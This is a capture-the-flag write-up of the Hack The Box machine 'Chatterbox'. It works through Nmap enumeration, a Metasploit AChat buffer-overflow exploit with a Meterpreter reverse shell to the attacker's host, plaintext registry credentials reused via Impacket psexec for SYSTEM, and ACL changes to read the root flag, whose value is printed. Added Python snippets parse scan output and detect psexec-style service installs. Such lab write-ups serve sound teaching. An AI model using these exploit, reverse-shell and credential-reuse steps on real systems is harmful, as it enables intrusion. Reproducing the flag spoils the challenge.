Chatterbox is a rather challenging box that tests the user’s ability to enumerate with NMAP, exploit a target with Metasploit, and find reused plaintext credentials to compromise the target.

Step 1: Enumerate with NMAP

As usual, the first step in our investigation is to enumerate the target with NMAP.

➜  chatterbox nmap -vv -A 10.129.3.102 -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-30 17:15 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:15
Completed NSE at 17:15, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:15
Completed Parallel DNS resolution of 1 host. at 17:15, 0.03s elapsed
Initiating Connect Scan at 17:15
Scanning 10.129.3.102 [65535 ports]
Discovered open port 135/tcp on 10.129.3.102
Discovered open port 445/tcp on 10.129.3.102
Discovered open port 139/tcp on 10.129.3.102
Discovered open port 49155/tcp on 10.129.3.102
Discovered open port 49153/tcp on 10.129.3.102
Discovered open port 49156/tcp on 10.129.3.102
Discovered open port 49152/tcp on 10.129.3.102
Discovered open port 49157/tcp on 10.129.3.102
Discovered open port 49154/tcp on 10.129.3.102
Discovered open port 9255/tcp on 10.129.3.102
Discovered open port 9256/tcp on 10.129.3.102
Completed Connect Scan at 17:16, 40.47s elapsed (65535 total ports)
Initiating Service scan at 17:16
Scanning 11 services on 10.129.3.102
Service scan Timing: About 54.55% done; ETC: 17:18 (0:00:46 remaining)
Completed Service scan at 17:17, 59.82s elapsed (11 services on 1 host)
NSE: Script scanning 10.129.3.102.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 9.64s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.38s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.01s elapsed
Nmap scan report for 10.129.3.102
Host is up, received user-set (0.045s latency).
Scanned at 2023-01-30 17:15:42 EST for 110s
Not shown: 65524 closed tcp ports (conn-refused)
PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         syn-ack AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
9256/tcp  open  achat        syn-ack AChat chat system
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
49153/tcp open  msrpc        syn-ack Microsoft Windows RPC
49154/tcp open  msrpc        syn-ack Microsoft Windows RPC
49155/tcp open  msrpc        syn-ack Microsoft Windows RPC
49156/tcp open  msrpc        syn-ack Microsoft Windows RPC
49157/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h39m59s, deviation: 2h53m13s, median: 4h59m58s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-01-31T03:17:26
|_  start_date: 2023-01-31T03:14:39
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 23592/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 36617/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 11802/udp): CLEAN (Timeout)
|   Check 4 (port 19481/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Chatterbox
|   NetBIOS computer name: CHATTERBOX\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-01-30T22:17:23-05:00

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:17
Completed NSE at 17:17, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.71 seconds

We can see that we have a lot of open ports, but the AChat ports (9255, 9256) strike us as most interesting. Let’s see if there are any enumeration scripts we can run against this service.
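To triage a scan like this without reading the whole report by hand, here is a small Python parser, added as an example and not part of the original writeup, that pulls the port table out of Nmap's normal output and flags the two things worth noticing here: open services whose banner is not a stock Windows component, and the SMB signing state reported by the host scripts. The sample input is a trimmed copy of the scan above; the function and class names are mine.

```python
import re
from dataclasses import dataclass

# Constructed sample: a trimmed copy of the port table and host-script
# findings from the scan above (same values, fewer lines).
SAMPLE_SCAN = """\
PORT      STATE SERVICE      REASON  VERSION
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp  open  http         syn-ack AChat chat system httpd
|_http-server-header: AChat
9256/tcp  open  achat        syn-ack AChat chat system
49152/tcp open  msrpc        syn-ack Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

# One row of the port table: "9256/tcp  open  achat  syn-ack AChat chat system"
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"\s+(?P<reason>\S+)\s*(?P<version>.*)$"
)


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str


def parse_ports(report: str) -> list[Port]:
    """Extract the port table rows from Nmap normal (-oN / stdout) output."""
    ports = []
    for line in report.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append(Port(int(m["port"]), m["proto"], m["state"],
                              m["service"], m["version"].strip()))
    return ports


def non_windows_services(ports: list[Port]) -> list[Port]:
    """Open ports whose version banner is not a built-in Windows component.
    These are the first places to look for third-party software."""
    return [p for p in ports
            if p.state == "open"
            and not p.version.startswith(("Microsoft Windows", "Windows "))]


def smb_signing_findings(report: str) -> list[str]:
    """Summarise the smb-security-mode / smb2-security-mode host-script lines."""
    findings = []
    for line in report.splitlines():
        body = line.lstrip("|_ ")          # drop the NSE tree decoration
        if "Message signing enabled but not required" in body:
            findings.append("SMB2: signing enabled but not required")
        elif body.startswith("message_signing:") and "disabled" in body:
            findings.append("SMB1: signing disabled")
    return findings


if __name__ == "__main__":
    ports = parse_ports(SAMPLE_SCAN)
    for p in non_windows_services(ports):
        print(f"{p.number}/{p.proto} {p.service}: {p.version}")
    for f in smb_signing_findings(SAMPLE_SCAN):
        print("finding:", f)
```

Run against the full scan it reports only 9255 and 9256 as non-Windows services, which matches the reasoning in the text, and both signing findings; from a hardening point of view the signing lines are the ones to fix first on any host that is not a lab target.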

Step 2: Checking for AChat version

We next load up Metasploit and search for anything related to AChat. We find a module for a remote buffer overflow that may work against the target.

msf6 > search achat

Matching Modules
================

   #  Name                            Disclosure Date  Rank    Check  Description
   -  ----                            ---------------  ----    -----  -----------
   0  exploit/windows/misc/achat_bof  2014-12-18       normal  No     Achat Unicode SEH Buffer Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/misc/achat_bof

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/achat_bof) > show info

       Name: Achat Unicode SEH Buffer Overflow
     Module: exploit/windows/misc/achat_bof
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-12-18

Provided by:
  Peter Kasza <peter.kasza@itinsight.hu>
  Balazs Bucsay <balazs.bucsay@rycon.hu>

Available targets:
  Id  Name
  --  ----
  0   Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT   9256             yes       The target port (UDP)

Payload information:
  Space: 730
  Avoid: 129 characters

Description:
  This module exploits a Unicode SEH buffer overflow in Achat. By 
  sending a crafted message to the default port 9256/UDP, it's 
  possible to overwrite the SEH handler. Even when the exploit is 
  reliable, it depends on timing since there are two threads 
  overflowing the stack in the same time. This module has been tested 
  on Achat v0.150 running on Windows XP SP3 and Windows 7.

References:
  https://cwe.mitre.org/data/definitions/121.html


View the full module info with the info -d command.

Step 3: Exploiting the Target

Let’s try using the exploit on the target.

msf6 exploit(windows/misc/achat_bof) > show options

Module options (exploit/windows/misc/achat_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT   9256             yes       The target port (UDP)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.173    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1



View the full module info with the info, or info -d command.

msf6 exploit(windows/misc/achat_bof) > set rhosts 10.129.3.102
rhosts => 10.129.3.102
msf6 exploit(windows/misc/achat_bof) > set lhost tun1
lhost => tun1
msf6 exploit(windows/misc/achat_bof) > run

[-] Exploit failed: windows/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.

The default payload could not be encoded within the module's constraints (730 bytes of space and 129 characters to avoid, per the payload information above), so let's try a different payload.

msf6 exploit(windows/misc/achat_bof) > set payload windows/meterpreter/reverse_tcp_allports 
payload => windows/meterpreter/reverse_tcp_allports
msf6 exploit(windows/misc/achat_bof) > run

[*] Started reverse TCP handler on 10.10.16.7:4444 
[*] Sending stage (175686 bytes) to 10.129.3.102
[*] Meterpreter session 2 opened (10.10.16.7:4444 -> 10.129.3.102:49159) at 2023-01-30 17:29:16 -0500

meterpreter > 
[*] 10.129.3.102 - Meterpreter session 2 closed.  Reason: Died

Our session died immediately. One option is to migrate to a different process as soon as the Meterpreter connection is established. After a few failed attempts we are forced to reset the machine and try again, as the exploit seems to only work on the first try against a fresh target (the module description already warns that it depends on the timing of two threads overflowing the stack at the same time).

After several attempts we are able to connect to a meterpreter session and migrate to a more stable process. Our shell no longer crashes within seconds of running the exploit.

msf6 exploit(windows/misc/achat_bof) > exploit

[*] Started reverse TCP handler on 10.10.16.7:4444 
[*] Sending stage (175686 bytes) to 10.129.57.55
[*] Meterpreter session 7 opened (10.10.16.7:4444 -> 10.129.57.55:49164) at 2023-01-30 17:42:07 -0500

meterpreter > migrate -P 1760
[*] Migrating from 852 to 1760...
[*] Migration completed successfully.
meterpreter > getuid
Server username: CHATTERBOX\Alfred
meterpreter > 

We can see that we are running as the CHATTERBOX\Alfred user, and we can go grab the user flag on their desktop.

Step 4: Escalating Privileges

We now need to escalate our privileges and grab the root flag. We search for quite some time until we find the following resource: https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html. Let's try checking the registry for any default or stored passwords.

meterpreter > shell
Process 1452 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>reg query HKLM /f password /t REG_SZ /s                                                  
reg query HKLM /f password /t REG_SZ /s

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
    InfoTip    REG_SZ    Manages users and passwords for this computer

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7be73787-ce71-4b33-b4c8-00d32b54bea8}
    (Default)    REG_SZ    HomeGroup Password

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8841d728-1a76-4682-bb6f-a9ea53b4b3ba}
    (Default)    REG_SZ    LogonPasswordReset

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\shell
    (Default)    REG_SZ    changehomegroupsettings viewhomegrouppassword starthomegrouptroubleshooter sharewithdevices

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\IAS.ChangePassword\CurVer
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{06F5AD81-AC49-4557-B4A5-D7E9013329FC}
    (Default)    REG_SZ    IHomeGroupPassword

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{3CD62D67-586F-309E-A6D8-1F4BAAC5AC28}
    (Default)    REG_SZ    _PasswordDeriveBytes

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{68FFF241-CA49-4754-A3D8-4B4127518549}
    (Default)    REG_SZ    ISupportPasswordMode

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Capabilities\Roaming\FormSuggest
    FilterIn    REG_SZ    FormSuggest Passwords,Use FormSuggest,FormSuggest PW Ask

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6f45dc1e-5384-457a-bc13-2cd81b0d28ed}
    (Default)    REG_SZ    PasswordProvider

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\ASK
    Text    REG_SZ    Prompt for user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SO\AUTH\LOGON\SILENT
    Text    REG_SZ    Automatic logon with current user name and password

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{63d2bb1d-e39a-41b8-9a3d-52dd06677588}\ChannelReferences\5
    (Default)    REG_SZ    Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password - PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\XWizards\Components\{C100BEEB-D33A-4A4B-BF23-BBEF4663D017}\Children\{C100BED7-D33A-4A4B-BF23-BBEF4663D017}
    (Default)    REG_SZ    WCN Password PIN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\EH-Tcp
    Password    REG_SZ    

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RemoteAccess\Policy\Pipeline\23
    (Default)    REG_SZ    IAS.ChangePassword

End of search: 49 match(es) found.

After carefully examining the output, we can see a DefaultPassword value of Welcome1! under the Winlogon key. Could this be Alfred's password, or even the Administrator's? Let's try using PSEXEC to connect to the victim as Administrator with our newly found password.
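Most of the 49 matches above are noise: reg query matches the search term against value names and data alike, so ProgIDs like IAS.ChangePassword and tooltip strings come back alongside the one real credential. As an added example (not part of the original writeup), the following Python script parses `reg query ... /s` output and keeps only values whose name contains the search term and whose data is non-empty. It runs on a constructed subset of the output above; the function names are mine.

```python
import re

# Constructed sample: a verbatim subset of the `reg query HKLM /f password
# /t REG_SZ /s` output shown above. Raw string, so the backslashes are literal.
SAMPLE_REG = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID
    (Default)    REG_SZ    IAS.ChangePassword.1

HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{7A9D77BD-5403-11d2-8785-2E0420524153}
    InfoTip    REG_SZ    Manages users and passwords for this computer

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    DefaultPassword    REG_SZ    Welcome1!

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\DefaultUserConfiguration
    Password    REG_SZ

End of search: 49 match(es) found.
"""

# reg query prints values as: 4 spaces, name, 4 spaces, type, 4 spaces, data.
# The data column is absent (or blank) when the value is empty.
VALUE_LINE = re.compile(
    r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+)(?: {4}(?P<data>.*))?$"
)


def parse_reg_query(text: str) -> list[tuple[str, str, str, str]]:
    """Return (key, value name, type, data) rows from `reg query ... /s` output."""
    key = None
    rows = []
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.rstrip()
            continue
        m = VALUE_LINE.match(line)
        if m and key is not None:
            rows.append((key, m["name"], m["type"], (m["data"] or "").strip()))
    return rows


def triage_credentials(rows, needle: str = "password"):
    """Keep rows whose value *name* contains the needle and whose data is set.
    Rows where only the data mentions it (ProgIDs, tooltips, prompt text) are
    dropped, as are empty placeholders such as Terminal Server's Password value."""
    return [(key, name, data) for key, name, _type, data in rows
            if needle in name.lower() and data]


if __name__ == "__main__":
    for key, name, data in triage_credentials(parse_reg_query(SAMPLE_REG)):
        print(f"{key}\n    {name} = {data}")
```

On a host you administer, the finding itself is the remediation target: Winlogon's DefaultPassword is the cleartext AutoAdminLogon password, and the Winlogon key is readable by an unprivileged local user, as the Alfred shell above demonstrates. Clearing the value and disabling automatic logon removes the exposure.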

Step 5: Using PSEXEC to get SYSTEM Shell

We use Impacket's psexec.py to connect to the target.

➜  chatterbox cd /opt/impacket 
➜  impacket ls
build  ChangeLog.md  dist  Dockerfile  examples  impacket  impacket.egg-info  LICENSE  MANIFEST.in  README.md  requirements-test.txt  requirements.txt  SECURITY.md  setup.py  TESTING.md  tests  tox.ini
➜  impacket cd examples     
➜  examples python3 psexec.py 'administrator':'Welcome1!'@10.129.57.55 -port 445
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.129.57.55.....
[*] Found writable share ADMIN$
[*] Uploading file iGypgYOf.exe
[*] Opening SVCManager on 10.129.57.55.....
[*] Creating service GCGr on 10.129.57.55.....
[*] Starting service GCGr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

Great, we have a SYSTEM shell. Now we just need to navigate to the administrator’s desktop and grab the flag.
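What that psexec.py run leaves behind is a good detection target: a service with a random four-letter name (GCGr) whose binary is a random eight-letter executable (iGypgYOf.exe) copied in through ADMIN$, which maps to the Windows directory, and which runs as LocalSystem. Windows records every service installation as event ID 7045 in the System log. The following Python script is an added example (not from the writeup and not Impacket's code) that scores constructed 7045 records with those heuristics. The image path of the first record is an assumption based on where an ADMIN$ upload lands; the names and the threshold are mine.

```python
import re
from dataclasses import dataclass


@dataclass
class ServiceInstall:
    """Fields pulled from a System log event ID 7045 ("A service was installed")."""
    record_id: int
    service_name: str
    image_path: str
    account: str


# Constructed sample events. The first mirrors what the psexec.py run above
# leaves behind (service GCGr, binary iGypgYOf.exe dropped via ADMIN$, which
# maps to the Windows directory); the others are ordinary installs.
SAMPLE_EVENTS = [
    ServiceInstall(101, "GCGr", r"%SystemRoot%\iGypgYOf.exe", "LocalSystem"),
    ServiceInstall(102, "Sense",
                   r"%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe",
                   "LocalSystem"),
    ServiceInstall(103, "MyBackupAgent", r"C:\Program Files\Vendor\agent.exe",
                   r"NT AUTHORITY\LocalService"),
]

LETTERS_ONLY = re.compile(r"^[A-Za-z]{4,8}$")


def looks_random(token: str) -> bool:
    """Short letters-only token with capitals after the first character.
    Weak on its own (MsSense trips it too), so it is combined with other checks."""
    if not LETTERS_ONLY.match(token):
        return False
    return any(c.isupper() for c in token[1:]) and any(c.islower() for c in token)


def in_windows_root(path: str) -> bool:
    """True if the binary sits directly in the Windows directory, not a subfolder."""
    p = path.lower().replace("/", "\\")
    for root in ("%systemroot%\\", "c:\\windows\\"):
        if p.startswith(root):
            return "\\" not in p[len(root):]
    return False


def score(event: ServiceInstall) -> list[str]:
    """Return the list of reasons this install looks like a remote-exec drop."""
    reasons = []
    exe = event.image_path.replace("/", "\\").rsplit("\\", 1)[-1]
    stem = exe[:-4] if exe.lower().endswith(".exe") else exe
    if looks_random(event.service_name):
        reasons.append("random-looking service name")
    if looks_random(stem):
        reasons.append("random-looking binary name")
    if in_windows_root(event.image_path):
        reasons.append("binary directly in the Windows directory (ADMIN$ drop)")
    if event.account.lower() == "localsystem":
        reasons.append("runs as LocalSystem")
    return reasons


def detect(events, min_reasons: int = 3):
    """Flag events that accumulate at least min_reasons indicators."""
    flagged = []
    for e in events:
        reasons = score(e)
        if len(reasons) >= min_reasons:
            flagged.append((e.record_id, e.service_name, reasons))
    return flagged


if __name__ == "__main__":
    for record_id, name, reasons in detect(SAMPLE_EVENTS):
        print(f"event {record_id} service {name}: " + "; ".join(reasons))
```

Only the first record crosses the threshold; the Defender service collects two weak signals and is left alone, which is the point of requiring several indicators before alerting rather than reacting to any one of them.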

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of C:\Users\Administrator\Desktop

12/10/2017  06:50 PM    <DIR>          .
12/10/2017  06:50 PM    <DIR>          ..
01/30/2023  10:37 PM                34 root.txt
	       1 File(s)             34 bytes
	       2 Dir(s)   3,671,711,744 bytes free

C:\Users\Administrator\Desktop> type root.txt
Access is denied.

Despite being SYSTEM, we cannot read the root flag. Let's jump back into our Meterpreter shell and check the file's permissions.

Step 6: Checking and Editing Flag Permissions

C:\Windows\system32>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 502F-F304

 Directory of C:\Users\Administrator\Desktop

12/10/2017  06:50 PM    <DIR>          .
12/10/2017  06:50 PM    <DIR>          ..
01/30/2023  10:37 PM                34 root.txt
	       1 File(s)             34 bytes
	       2 Dir(s)   3,676,585,984 bytes free

C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

The ACL contains a single entry, Full Control for the Administrator account, and no entry for SYSTEM, which is why even the SYSTEM shell got "Access is denied". Let's see if we can update the permissions.
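To make that check mechanical, here is a small parser for icacls output, added as an example and not part of the original writeup. It reads the ACE lines and reports which expected principals have no read-granting entry; on the listing above it shows that neither SYSTEM nor the Administrators group has an entry, only the Administrator account. The function names are mine, the second sample ACL is constructed, and the parser assumes file names without spaces and treats a DENY entry simply as no access.

```python
import re

# Constructed samples. The first is the icacls listing above, verbatim;
# the second is what an inherited ACL on a user's file typically looks like.
SAMPLE_ACL_LOCKED = """\
root.txt CHATTERBOX\\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files
"""

SAMPLE_ACL_DEFAULT = """\
notes.txt NT AUTHORITY\\SYSTEM:(I)(F)
          CHATTERBOX\\Administrators:(I)(F)
          CHATTERBOX\\Alfred:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# One ACE: "<principal>:(flag)(flag)...", e.g. "NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)"
ACE = re.compile(r"^(?P<principal>[^:]+?):(?P<flags>(?:\([^)]*\))+)$")

# Simple rights and specific rights that include reading the file's data.
READ_RIGHTS = {"F", "M", "RX", "R", "RD", "GR"}


def parse_icacls(text: str):
    """Return (file name, {principal: [flag tokens]}) for one icacls listing.
    Assumes the file name has no spaces; icacls indents continuation lines
    to the width of the name, so those are simply stripped."""
    filename, acl = None, {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("Successfully processed"):
            continue
        if filename is None:
            filename, _, ace_text = line.partition(" ")
        else:
            ace_text = line.strip()
        m = ACE.match(ace_text)
        if m:
            tokens = re.findall(r"\(([^)]*)\)", m["flags"])
            acl.setdefault(m["principal"], []).extend(tokens)
    return filename, acl


def can_read(acl: dict, principal: str) -> bool:
    """True if the principal's own ACE grants a read right. Group membership is
    not resolved here: check each group the account belongs to as well. A
    DENY entry is treated as no access (a simplification of real ACE ordering)."""
    tokens = acl.get(principal, [])
    if "DENY" in tokens:
        return False
    for tok in tokens:
        if any(right in READ_RIGHTS for right in tok.split(",")):
            return True
    return False


def principals_missing_read(acl: dict, expected) -> list[str]:
    """Which of the expected principals have no read-granting entry at all."""
    return [p for p in expected if not can_read(acl, p)]


if __name__ == "__main__":
    name, acl = parse_icacls(SAMPLE_ACL_LOCKED)
    missing = principals_missing_read(
        acl, ["NT AUTHORITY\\SYSTEM", "CHATTERBOX\\Administrators"])
    print(f"{name}: no read entry for {', '.join(missing)}")
```

SYSTEM does not bypass a DACL; without an entry it is denied like any other principal, which is what the SYSTEM shell ran into. Whether the /grant that follows succeeds depends on the caller holding the right to change the DACL (the file's owner always does; `dir /q` shows the owner), which is the check to make before trying it.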

C:\Users\Administrator\Desktop>icacls root.txt /grant Alfred:F
icacls root.txt /grant Alfred:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>type root.txt
type root.txt
c18d2b1ee1f8a1781a87103809d0e785

We were able to update the permissions and read the file! The only remaining step is to submit the flag.